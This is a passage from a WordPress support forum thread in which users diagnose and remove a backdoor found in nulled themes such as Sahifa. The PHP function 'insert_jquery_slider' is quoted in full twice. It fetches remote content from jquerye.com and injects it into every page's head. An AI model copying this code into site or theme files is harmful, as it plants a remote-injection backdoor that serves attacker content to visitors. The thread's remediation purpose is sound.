Viewing 12 replies - 31 through 42 (of 42 total)
  • I also find that backdoor, thank you @stefanristicdev

    i had same problem on occhiali moda 2013, it’s just because jquery group didn’t renew jquerye.com domain and some theme refer to jquerye.com/… for jquery 1.6.3 minified.

    I solved the problem on my SAHIFA WordPress theme

    I found the code
    <?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "https://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>
    at this Sahifa / includes / functions-init.php

    Then I remain only `<?php?>

    Upload again to my site on the same directory..

    PDIMG

    (@stefanristicdev)

    -I’m glad that my method have helped to some of you, but:

    Please be sure to check links that @esmi posted on how to secure your wordpress website etc.

    -I know that most of us got this problem because we used nulled themes/plugins, but same goes for both nulled and legal add-ons owners:

    No one cannot guarantee that this was the only malicious code. In fact, this code exposed itself only because “jquerye.com” went down. “jquerye.com” could still be alive, and no one would notice it – because your website was working “fine” and “only” invisible spammy backlinks generated by this hack were a problem.

    Edit:I really hope that each one of you knew this already, but no harm from pointing it out over and over again:

    After this kind of situation, immediate change of all usernames and passwords(FTP/Hosting/cPanel/Wordpress/Database) is something you don’t want to skip.

    @stefanristicdev: Well said! ??

    PDIMG

    (@stefanristicdev)

    @mikcheck

    i had same problem on occhiali moda 2013, it’s just because jquery group didn’t renew jquerye.com domain and some theme refer to jquerye.com/… for jquery 1.6.3 minified.

    You’re wrong.

    #1 The “jquery slider” wouldn’t work after you remove this function – if there were a need for this file.

    #2 Find original jquery-1.6.3.min.js add it to your website, and replace the link in this files with your(original) one. You will(at least I did) get a ten times worse header output with a bunch of problems.

    #3

    add_action('wp_head', 'insert_jquery_slider')

    Why would anyone add a jquery slider in the <head> section of the website ? ??

    @stefanristicdev I would like to thank you for your help. Actually ive been looking the net since Wednesday night. Im glad this was resolved.

    1 Notepad++ really helped me find that code.
    2 I just edit the php file on my cpanel
    3 The website is now neat as before.

    Thanks StefanRisticDev

    I have solution.

    Go to your cpanel –> File Manager –> wp-content –> themes –> “YOUR THEME ” –>includes –> postformats –> post.php

    Find this code:

    <?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "https://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init();	$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>

    And delete all this code and past this:
    <?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){return '';}add_action('wp_head', 'insert_jquery_slider');} ?>

    And Save

    Or open your theme and search on current directory option the post.php
    and fix it.
    if you need help contact me [contact information removed – please provide any and all help here]

    7jibril

    (@7jibril)

    Thank you,
    to “StefanRisticDev” and “jomarlipon”
    you can take the time to help others, I have experienced the same thing, but each theme is different, there are problems:
    functions.php
    some are in
    init.php (…. / includes / functions-init.php)
    Since I’ve come across in the second file.
    Thanks

    artcore100

    (@artcore100)

    We had the same problem with some of our sites and it worked like a charme to edit the functions.php, but unfortunately it really depends on the theme…,so we found further backdoors inside some hooks and partially in theme-options.php and core.php! m?bel-onlineshop.net is now working again, but thanks for your help!

    aryankamgar

    (@aryankamgar)

    I have the same problem when i am opening my website https://www.epcc.af it gives me error message ( 404 Error File Not Found

    The page you are looking for might have been removed,
    had its name changed, or is temporarily unavailable. )

    And i am using Nulled theme please help me ASAP

    How to fix this problem.

    Thanks Alot in advance

    Best Regards,
    Aryan

    Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    @aryankamgar, please at least read the suggestions in a thread before posting.

Viewing 12 replies - 31 through 42 (of 42 total)
  • The topic ‘www.jquerye.com/jquery-1.6.3.min.js (port 80) error’ is closed to new replies.